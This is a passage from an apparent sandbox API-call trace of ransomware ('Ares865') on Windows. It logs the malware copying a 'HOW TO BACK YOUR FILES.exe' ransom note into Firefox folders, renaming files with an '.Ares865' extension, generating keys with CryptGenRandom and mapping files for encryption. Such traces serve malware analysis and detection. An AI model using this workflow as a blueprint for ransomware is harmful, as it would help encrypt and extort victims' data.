param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini.Ares865") returned 68 [0127.847] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\webapprt.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\webapprt.ini.ares865"), dwFlags=0x1) returned 1 [0127.849] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\webapprt.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.849] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=487) returned 1 [0127.849] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.850] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.850] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.850] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f0, lpName=0x0) returned 0x170 [0127.853] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f0) returned 0x190000 [0127.853] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.854] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.854] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.855] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall") returned="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall" [0127.855] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall") returned="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall" [0127.855] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0127.855] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\how to back your files.exe"), bFailIfExists=1) returned 0 [0127.856] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0127.856] GetLastError () returned 0x0 [0127.856] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0127.856] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaef1c160, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x523c9b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x523c9b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0127.856] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0127.857] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0127.857] lstrcpyW (in: lpString1=0x2cce462, lpString2="helper.exe" | out: lpString1="helper.exe") returned="helper.exe" [0127.857] lstrlenW (lpString="helper.exe") returned 10 [0127.857] lstrlenW (lpString="Ares865") returned 7 [0127.857] lstrcmpiW (lpString1="per.exe", lpString2="Ares865") returned 1 [0127.857] lstrlenW (lpString=".dll") returned 4 [0127.857] lstrcmpiW (lpString1="helper.exe", lpString2=".dll") returned 1 [0127.857] lstrlenW (lpString=".lnk") returned 4 [0127.857] lstrcmpiW (lpString1="helper.exe", lpString2=".lnk") returned 1 [0127.857] lstrlenW (lpString=".ini") returned 4 [0127.857] lstrcmpiW (lpString1="helper.exe", lpString2=".ini") returned 1 [0127.857] lstrlenW (lpString=".sys") returned 4 [0127.857] lstrcmpiW (lpString1="helper.exe", lpString2=".sys") returned 1 [0127.857] lstrlenW (lpString="helper.exe") returned 10 [0127.857] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe.Ares865") returned 67 [0127.857] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\helper.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\helper.exe.ares865"), dwFlags=0x1) returned 1 [0127.859] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\helper.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.859] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=872352) returned 1 [0127.859] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.860] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.860] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.860] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd52a0, lpName=0x0) returned 0x170 [0127.861] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd52a0) returned 0xdd0000 [0127.895] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.895] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.895] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.907] lstrcpyW (in: lpString1=0x2cce462, lpString2="shortcuts_log.ini" | out: lpString1="shortcuts_log.ini") returned="shortcuts_log.ini" [0127.907] lstrlenW (lpString="shortcuts_log.ini") returned 17 [0127.907] lstrlenW (lpString="Ares865") returned 7 [0127.907] lstrcmpiW (lpString1="log.ini", lpString2="Ares865") returned 1 [0127.907] lstrlenW (lpString=".dll") returned 4 [0127.908] lstrcmpiW (lpString1="shortcuts_log.ini", lpString2=".dll") returned 1 [0127.908] lstrlenW (lpString=".lnk") returned 4 [0127.908] lstrcmpiW (lpString1="shortcuts_log.ini", lpString2=".lnk") returned 1 [0127.908] lstrlenW (lpString=".ini") returned 4 [0127.908] lstrcmpiW (lpString1="shortcuts_log.ini", lpString2=".ini") returned 1 [0127.908] lstrlenW (lpString=".sys") returned 4 [0127.908] lstrcmpiW (lpString1="shortcuts_log.ini", lpString2=".sys") returned 1 [0127.908] lstrlenW (lpString="shortcuts_log.ini") returned 17 [0127.908] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini.Ares865") returned 74 [0127.908] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\shortcuts_log.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\shortcuts_log.ini.ares865"), dwFlags=0x1) returned 1 [0127.920] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\shortcuts_log.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.920] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=322) returned 1 [0127.920] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.921] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.921] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.921] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x170 [0127.938] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0127.940] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.941] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.941] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.942] lstrcpyW (in: lpString1=0x2cce462, lpString2="uninstall.log" | out: lpString1="uninstall.log") returned="uninstall.log" [0127.942] lstrlenW (lpString="uninstall.log") returned 13 [0127.942] lstrlenW (lpString="Ares865") returned 7 [0127.942] lstrcmpiW (lpString1="all.log", lpString2="Ares865") returned -1 [0127.942] lstrlenW (lpString=".dll") returned 4 [0127.942] lstrcmpiW (lpString1="uninstall.log", lpString2=".dll") returned 1 [0127.942] lstrlenW (lpString=".lnk") returned 4 [0127.942] lstrcmpiW (lpString1="uninstall.log", lpString2=".lnk") returned 1 [0127.942] lstrlenW (lpString=".ini") returned 4 [0127.942] lstrcmpiW (lpString1="uninstall.log", lpString2=".ini") returned 1 [0127.942] lstrlenW (lpString=".sys") returned 4 [0127.942] lstrcmpiW (lpString1="uninstall.log", lpString2=".sys") returned 1 [0127.942] lstrlenW (lpString="uninstall.log") returned 13 [0127.942] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log.Ares865") returned 70 [0127.942] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\uninstall.log"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\uninstall.log.ares865"), dwFlags=0x1) returned 1 [0127.944] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\uninstall.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.944] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1940) returned 1 [0127.944] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.945] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.945] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.945] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaa0, lpName=0x0) returned 0x170 [0127.947] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaa0) returned 0x190000 [0127.948] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.948] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.948] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.949] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries") returned="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries" [0127.949] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries") returned="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries" [0127.949] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0127.949] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\how to back your files.exe"), bFailIfExists=1) returned 0 [0127.950] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0127.950] GetLastError () returned 0x0 [0127.951] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0127.952] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaefb46e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x523c9b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x523c9b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0127.952] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0127.952] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0127.952] lstrcpyW (in: lpString1=0x2cce468, lpString2="en-US.aff" | out: lpString1="en-US.aff") returned="en-US.aff" [0127.952] lstrlenW (lpString="en-US.aff") returned 9 [0127.952] lstrlenW (lpString="Ares865") returned 7 [0127.952] lstrcmpiW (lpString1="-US.aff", lpString2="Ares865") returned 1 [0127.952] lstrlenW (lpString=".dll") returned 4 [0127.952] lstrcmpiW (lpString1="en-US.aff", lpString2=".dll") returned 1 [0127.952] lstrlenW (lpString=".lnk") returned 4 [0127.952] lstrcmpiW (lpString1="en-US.aff", lpString2=".lnk") returned 1 [0127.952] lstrlenW (lpString=".ini") returned 4 [0127.952] lstrcmpiW (lpString1="en-US.aff", lpString2=".ini") returned 1 [0127.952] lstrlenW (lpString=".sys") returned 4 [0127.952] lstrcmpiW (lpString1="en-US.aff", lpString2=".sys") returned 1 [0127.952] lstrlenW (lpString="en-US.aff") returned 9 [0127.953] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff.Ares865") returned 69 [0127.953] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.aff"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.aff.ares865"), dwFlags=0x1) returned 1 [0127.955] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.aff.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.955] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3274) returned 1 [0127.956] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.956] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.956] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.956] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfd0, lpName=0x0) returned 0x170 [0127.962] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd0) returned 0x190000 [0127.963] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.963] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.963] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.964] lstrcpyW (in: lpString1=0x2cce468, lpString2="en-US.dic" | out: lpString1="en-US.dic") returned="en-US.dic" [0127.964] lstrlenW (lpString="en-US.dic") returned 9 [0127.964] lstrlenW (lpString="Ares865") returned 7 [0127.964] lstrcmpiW (lpString1="-US.dic", lpString2="Ares865") returned 1 [0127.964] lstrlenW (lpString=".dll") returned 4 [0127.964] lstrcmpiW (lpString1="en-US.dic", lpString2=".dll") returned 1 [0127.964] lstrlenW (lpString=".lnk") returned 4 [0127.964] lstrcmpiW (lpString1="en-US.dic", lpString2=".lnk") returned 1 [0127.964] lstrlenW (lpString=".ini") returned 4 [0127.964] lstrcmpiW (lpString1="en-US.dic", lpString2=".ini") returned 1 [0127.964] lstrlenW (lpString=".sys") returned 4 [0127.964] lstrcmpiW (lpString1="en-US.dic", lpString2=".sys") returned 1 [0127.964] lstrlenW (lpString="en-US.dic") returned 9 [0127.964] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic.Ares865") returned 69 [0127.964] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.dic"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.dic.ares865"), dwFlags=0x1) returned 1 [0127.966] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.dic.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.966] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=624190) returned 1 [0127.966] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.967] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.967] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.967] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x98940, lpName=0x0) returned 0x170 [0127.968] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x98940) returned 0xdd0000 [0127.992] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.993] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.993] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.002] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\defaults", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults") returned="C:\\Program Files (x86)\\Mozilla Firefox\\defaults" [0128.002] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\defaults" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults") returned="C:\\Program Files (x86)\\Mozilla Firefox\\defaults" [0128.002] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.002] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.003] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.003] GetLastError () returned 0x0 [0128.004] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.004] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaefb46e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x523c9b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x523c9b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.004] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.004] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.004] lstrcpyW (in: lpString1=0x2cce460, lpString2="pref" | out: lpString1="pref") returned="pref" [0128.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0128.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2e4710 [0128.004] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0128.004] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf23be40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x523efca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x523efca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pref", cAlternateFileName="")) returned 0 [0128.004] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.004] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0128.004] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref") returned="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref" [0128.005] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref") returned="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref" [0128.005] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.005] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.005] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.006] GetLastError () returned 0x0 [0128.006] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.006] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf23be40, ftCreationTime.dwHighDateTime=0x1d2dda4, 